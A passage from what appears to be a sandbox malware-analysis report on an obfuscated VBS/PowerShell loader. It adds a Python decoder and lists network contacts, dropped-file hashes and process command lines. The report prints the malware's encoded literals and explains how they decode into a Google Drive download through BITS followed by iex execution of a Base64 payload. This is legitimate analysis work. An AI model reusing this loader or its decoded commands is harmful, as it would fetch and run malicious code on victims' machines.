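The powershell.exe command line above can be read without running it. The loader computes the letter `s` from `cmd /c set /A 115^^0` (`^^` is cmd's escape for `^`, so this is 115 XOR 0, and `[char]115` is `s`), appends `ubstring` to get the method name, and `Genanvendelsesprocessens` then keeps every 8th character of each quoted literal starting at offset 7; the loop bound `Length-1` discards the final padding chunk. `Alfridaric` is `& iex`, so each decoded literal is executed. The following is an added Python re-implementation, not code from the report or from the sample: it decodes six literals copied verbatim from the 64-bit command line (they resolve to the BITS job state `Transferring`, `iex`, the drive.google.com download URL that matches the Network section, `$global:Podargidae=$env:appdata`, `Import-Module BitsTransfer`, and the `substring(308197,31929)` slice that becomes the next stage), and it checks chunk alignment, because this page's extraction dropped non-ASCII letters (the Danish æ/ø/å in the filler words), which is why a few literals on the page no longer decode cleanly (the one assigning `$global:Styrekortene`, where the chunk `Stvkon=` is seven characters long, is one). The function names, the `PAGE_STRINGS` keys and the `SNIPPET` are mine.

```python
import re

# Literals copied verbatim from the 64-bit powershell.exe command line above.
# Every one is passed to Genanvendelsesprocessens; the dict keys are my labels.
PAGE_STRINGS = {
    "Byretternes248": "DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ",
    "Forsmdeligheder": " kao.iniK artaleAvlsk,exsquilge ",
    "Skeetskydning": "A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ",
    "Podargidae": "Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ",
    "bits_import": "urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ",
    "Marginaliseret": "Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ",
}


def derive_method_name():
    """$Duefalks=(cmd /c set /A 115^^0) -> "115"; [char]115 -> 's'; + 'ubstring'."""
    return chr(115 ^ 0) + "ubstring"


def decode_padded(s, start=7, step=8):
    """Genanvendelsesprocessens: keep s[7], s[15], ... while index < len(s)-1,
    i.e. the last character of every 8-byte chunk except the trailing one."""
    return "".join(s[i] for i in range(start, len(s) - 1, step))


def filler_ok(s, step=8):
    """An intact literal is a whole number of chunks. Text that lost characters
    (this page's extraction stripped æ/ø/å from filler words) fails this and
    would decode to garbage from the damaged chunk onwards."""
    return len(s) % step == 0


def decode_all(strings):
    """Decode every literal that is still aligned; None marks a damaged one."""
    return {name: (decode_padded(s) if filler_ok(s) else None) for name, s in strings.items()}


def find_literals(powershell_cmd):
    """Pull each quoted argument of Genanvendelsesprocessens out of a raw command
    line, so a whole sample can be decoded instead of hand-copied literals."""
    return re.findall(r"Genanvendelsesprocessens\s+'([^']*)'", powershell_cmd)


# Constructed fragment in the shape of the real command line, built from the
# literals above, to exercise find_literals() without the full 6 KB string.
SNIPPET = (f"$Forsmdeligheder=Genanvendelsesprocessens '{PAGE_STRINGS['Forsmdeligheder']}';"
           f"$Byretternes248=Genanvendelsesprocessens '{PAGE_STRINGS['Byretternes248']}';")


if __name__ == "__main__":
    print("method:", derive_method_name())
    for name, text in decode_all(PAGE_STRINGS).items():
        print(f"{name}: {text!r}")
    print([decode_padded(lit) for lit in find_literals(SNIPPET)])
```

Run against the full command line, `find_literals` plus `decode_all` gives the loader's plaintext: the Google Drive URL is fetched with Start-BitsTransfer into `$Podargidae`, which the cleartext part of the script sets to `%APPDATA%\Frosts.sig`; the loop polls until the BITS job leaves the `Transferring` state and the file exists; the file is then Base64-decoded and a 31929-byte slice at offset 308197 is handed to `iex`. Literals that fail `filler_ok` on this page need the original sample, with its non-ASCII filler characters intact, rather than the extracted text.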

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 c182cc2051a1f2cb0f78364db81b9fc1
SHA1 afef4d6a4f66aa307df4ed1179256d4667444585
SHA256 5e29ffa5f6109f87e5d4205a591bbc8fcb529e3643462f6487b5479eb46d79be
SHA512 40b2d28acdfa3eda9997c385a67e86c0a120e1a12cc3c51ff2d649c262f458089be88c63ac042b43fed19386e6664bba6a632db67357f71f53c4719f30b37eac

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 8554355ff9009da1b1c8536a9bb2e2fd
SHA1 539aef5de341d53a43fa26a2d5e6ddd7f82a508d
SHA256 aa4e604ec667d549b72c32b33e76269b0cdabc5c747b67889e7bfad238760d39
SHA512 256472a8fa9f1381fedf8ed14858786f63ed4fa176eb5940abf5d90dc2547356458a9cbf5ec39de949e7a79c698fe91c708ebd8114d759d310c9f308e44bdb94

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 e55e9d1ae5fe8f525a35539ef7cb8a26
SHA1 eae2cc90fe2fff8c8391a4ba827aa06064c729bc
SHA256 4a45982b8c4124238f30262f24e37fd9dd3461728376854a3b7efb0fadc7c585
SHA512 bfebd15265f78a76f237c2bd695b813f0580cece1a53ca61291011c1edfa8845e2e436ea609b3cfb4be94001106ec8373438dc8483656ba33209db29c815cf89

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 41077e923293898955e78267b7878339
SHA1 36083128a00b83103bfe8bc36b0042ff6a703012
SHA256 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0
SHA512 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922

memory/1388-298-0x000000001B290000-0x000000001B572000-memory.dmp

memory/1388-300-0x0000000002420000-0x0000000002428000-memory.dmp

memory/1388-299-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

memory/1388-301-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-302-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-303-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-304-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

memory/1388-305-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-306-0x00000000029A0000-0x00000000029C2000-memory.dmp

memory/1388-307-0x0000000002840000-0x0000000002852000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EM8DQYYW9H7S7EBS6TKR.temp

MD5 1af72430a9d0a1b2bbd984d5e23e81aa
SHA1 bf5d0480b4dc3bb98d8b439fe71af29058f4baf8
SHA256 35df3e1bc498ec96e4c32c1185b5fa898b27336db00fe71d26f118cff3ed0ce3
SHA512 65904ba5927e73ee66ba5545ef3d74605e343838883a89402f594246ecb1ccc2e38cab39279eacf0751b440d5b4ae6779cb0e9ff25db959d12eae571f1fe3e06

memory/1756-310-0x0000000073080000-0x000000007362B000-memory.dmp

memory/1756-311-0x0000000002640000-0x0000000002680000-memory.dmp

memory/1756-312-0x0000000073080000-0x000000007362B000-memory.dmp

memory/1388-313-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

memory/1756-314-0x0000000002640000-0x0000000002680000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabBDD3.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0250596cd7064b5a57b4367a7ca7af90
SHA1 5e8c88112e62648215b76323353ceedeb0261ce6
SHA256 ef0b6ea2ee2c0cc0a4d9335e5c07599f8aa12adf6473a6a768937463652fcea3
SHA512 d3c1afad19c1a08d15628bd762bbec9e9c2c32a6c7fac3247f6052314199194616234eee928740e233bfb78a8c0a41bdea34987525216690d44f6062a5e42763

memory/1388-326-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-327-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-328-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-329-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1756-330-0x0000000002640000-0x0000000002680000-memory.dmp

memory/1756-331-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

memory/1756-332-0x00000000050D0000-0x00000000050D1000-memory.dmp

memory/1756-333-0x0000000006530000-0x000000000B2A6000-memory.dmp

memory/1756-334-0x0000000073080000-0x000000007362B000-memory.dmp

memory/1756-336-0x0000000002640000-0x0000000002680000-memory.dmp

memory/1756-337-0x0000000077040000-0x00000000771E9000-memory.dmp

memory/1756-339-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

memory/1756-340-0x0000000077230000-0x0000000077306000-memory.dmp

memory/2488-341-0x0000000077040000-0x00000000771E9000-memory.dmp

memory/2488-342-0x0000000077230000-0x0000000077306000-memory.dmp

memory/2488-343-0x0000000077266000-0x0000000077267000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar7B49.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e9a2db3c218cd02fbd23c3ffdd7f9e02
SHA1 8abc9172b0d4631ab0ab99988b25be4529e03644
SHA256 ec015b733fe5f63d3d928e1cd6148e257aa9ee047104c1d4804a82a0471ac76d
SHA512 5a59c89daeab23978422138d6b640c6d67ffc6b15078cd4ceeb8d1ba42445ab7a7a1ffcdc93ffdf202dfd45b470359d3d3d1dd73854bbdcdb9a95da520eea1a6

memory/2488-368-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-367-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-369-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-370-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-371-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-372-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-373-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-374-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-375-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-366-0x0000000000590000-0x0000000005306000-memory.dmp

memory/2488-376-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-377-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1388-378-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/2488-402-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-403-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-404-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-405-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-406-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-407-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-408-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-409-0x0000000000400000-0x0000000000581000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 02:11

Reported

2024-03-29 02:14

Platform

win10v2004-20231215-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4384 -ip 4384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 2632

Network


Files

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmtcztfo.v2b.ps1
